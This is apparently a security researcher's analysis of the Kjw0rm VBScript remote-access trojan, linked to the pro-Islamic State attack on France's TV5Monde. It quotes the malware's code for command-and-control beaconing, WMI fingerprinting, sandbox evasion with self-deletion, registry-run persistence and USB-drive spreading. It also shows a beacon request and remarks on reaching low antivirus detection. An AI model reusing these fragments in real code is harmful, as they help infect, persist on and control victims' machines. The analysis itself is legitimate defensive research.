Pro-Islamic state hackers conducted an attack against “TV5Monde” TV station in France, news sources report that the Islamic hacktivist were apparently unhappy about the TV station that covered the recent events in Paris.
TV5Monde’s “defaced” twitter account.
Sources report that the attack chain was a social engineering phishing via social networks that was followed by exploitation of java components to perform a drive-by-download, which later led to the execution of “Kjw0rm” malware.
“Kjw0rm” is a malware that was first seen in the wild around January 2014.
It has many variations, the older parent version is named “Njw0rm”, Both of the malwares and all the other variations belong to the same family, which shares a lot of functionality and similarity in their working flow.
Kjw0rm’s main window, infected hosts detailed view and control.
The builder options and the implementation inside the generated sample :
The attacker can configure the IP of the C&C, the listening port, the directory to install the malware and the name of the victims, which will be stored after a successful execution on the victim machine.
To play with the sample generated by the Kjw0rm builder, we should patch the environment or remove the “vmcheck” inside the sample of .vbs file.
Simple technique to avoid automatic analysis if the environment is not properly set (Like online sandboxes).
The communication channel-
“Set o = CreateObject(“MSXML2.XMLHTTP”) o.open “POST”,”http://” & host & “:” & port &”/” & cmd, false o.setRequestHeader “User-Agent:”, inf o.send da post=o.responseText”
Extracted Info reported to C&C :
Using WMI
“Set a = GetObject(“winmgmts:{impersonationLevel=impersonate}!.rootcimv2″)
Set aa = a.ExecQuery(“SELECT * FROM Win32_LogicalDisk”)
For Each aaa In aa if aaa.VolumeSerialNumber<>””
then HWD= “KJw0rm_” & aaa.VolumeSerialNumber”
VM Check
“function vmcheck()
On Error Resume Next
Set WMI = GetObject(“WinMgmts:”)
Set Col = WMI.ExecQuery(“Select * from Win32_ComputerSystemProduct”)
For Each Ob in Col
if instr( lcase( ob.name),”virtual”) >0 then
On Error Resume Next f
s.deletefile(wscript.scriptfullname)”
Infected host traffic query for commands and reporting alive status.
The malware passes the basic info about the infected host via the “user-agent” header.
We can also notice the “UA-CPU” header.
The malware has three cases to decide its next operation, controlled by the attacker(admin).
● 0 (do nothing)
● excKsks(download and execute)
● uns(Uninstall and terminate)
Some of its obfuscation (related to being detected by AVs), the builder automatically generate a sample with obfuscated operations, since those techniques or related strings are already detected when in clear-text.
.VBS packers/obfuscators are not new in the market, some developers already implement such techniques inside their builders, but in case of detection the attacker can easily purchase a new packer to clear the detection rate by the AV industry.
Detected by 8/57 AV with known .VBS crypter, little patching was needed for FUD sample.
This sample is actually uploaded today by us, as you see only a few solutions were able to detect it. Of course if we wanted to make it undetectable completely, we could obfuscate some functions in the VBS file etc, the possibilities are endless in this case.
Offensive Part
“POST /ready HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent:Jw0rm_4CC893CUSER-PCuserWin7 Ultimate SP1
x641.9XYesv2.0NoKw0rm_4CC8593C
UA-CPU: AMDX64
Accept-Encoding: gzip, deflate
Host: 192.168.1.139:1010
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache”
Kjw0rm and other variants were built with an insecure management application, the developers didn’t implement authentication or any other enforcement between the malware and it’s C&C, allowing the ability to exploit the server by manipulating the data sent, for example to cause denial-of-service condition to shutdown active panel.
*Note
Most of the simple malware have many vulnerabilities within their management, and simple penetration testing techniques can also apply there in order to gain access to the “attackers side”.
Persistence
The malware uses the following reg keys to stay in the system:
sh.regwrite “HKCUSoftwareMicrosoftWindowsCurrentVersionRun” & fn, chrw(34) & dr & fn &
chrw(34), “REG_SZ”
sh.regwrite “HKLMSoftwareMicrosoftWindowsCurrentVersionRun” & fn, chrw(34) & dr & fn &
chrw(34), “REG_SZ”
“HKEY_LOCAL_MACHINESOFTWAREClasses” &
sh.regread(“HKEY_LOCAL_MACHINESOFTWAREClasses.” & Split(x.name, “.”)(UBound(Split(x.name, “.”)))
& “”) & “DefaultIcon”)
Some of its spreading/replication code:
for each xx in fs.Drives
if xx.isready then
if xx.FreeSpace >0 then
if xx.drivetype=1 then
if fs.fileexists(xx.path & “” & fn) then
fs.getfile(xx.path & “” & fn).Attributes=0
end if
fs.copyfile dr & fn , xx.path & “” & fn,true
For Each x In fs.GetFolder( xx.path & “”).Files
On Error Resume Next
if instr(x.name,”.”) then
if lcase( Split(x.name, “.”)(UBound(Split(x.name, “.”))))<>”lnk” then
x.Attributes = 0
if ucase(x.name) <> ucase(fn) then
fs.deletefile(xx.path & “” & x.name & “.lnk” )
else
fs.deletefile( xx.path & “” & x.name )
Kjw0rm is a RAT with basic management application GUI, that provides the attacker the ability to control infected hosts and view details about their machine, generate .vbs samples with preconfigured options.
Since it’s easy to avoid AVs with simple logic, malwares more and more base their code on VBScript language and there are many samples to learn from implementing VM checks, sleeps, packing techniques, WMI commands to extract information from the victim. Serving as a simple channel between the attacker and the victim and allowing the attacker to execute remote code at any time without interference.
We are aware of other variants with similar capabilities, since this malware family is based on readable code, shared and sold, allowing criminals to implement their desired features and craft new variants without too much difficulties.
